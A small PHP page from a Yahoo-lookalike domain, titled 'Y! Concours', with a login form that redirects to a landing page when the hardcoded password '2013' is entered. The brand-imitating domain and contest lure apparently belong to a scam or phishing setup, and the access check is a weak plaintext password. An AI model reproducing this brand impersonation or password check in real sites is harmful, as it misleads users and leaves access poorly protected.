File: /home/vmasmheia229/domains/pebble-yahoo.com/html/index.php
<?php
?><?php
?><?php
?><?php
$pass = $_POST['pass'];
if($pass == "2013")
{
header("Location: http://pebble-yahoo.com/landpage.html");
}
if(isset($_POST))
{?>
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>Y! Concours</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0" />
<meta name="apple-mobile-web-app-capable" content="yes" />
<meta name="apple-mobile-web-app-status-bar-style" content="black" />
<!-- Icons -->
<link href="./images/launch_icon_57.png" rel="apple-touch-icon" />
<link href="./images/.png" rel="apple-touch-startup-image" />
<!-- Stylesheets -->
<link href="./style.css" rel="stylesheet" type="text/css" media="screen" />
<script>(function(a,b,c){if(c in b&&b[c]){var d,e=a.location,f=/^(a|html)$/i;a.addEventListener("click",function(a){d=a.target;while(!f.test(d.nodeName))d=d.parentNode;"href"in d&&(d.href.indexOf("http")||~d.href.indexOf(e.host))&&(a.preventDefault(),e.href=d.href)},!1)}})(document,window.navigator,"standalone")</script>
</head>
<body>
<div id="wrapper">
<form method="POST">
<h1>Login</h1> <br><br>
<input class="pass" type="TEXT" name="pass"></input>
<br>
<input class="btn" type="submit" name="submit"></input>
</form>
</div>
</div>
</body>
</html>
<?}
?>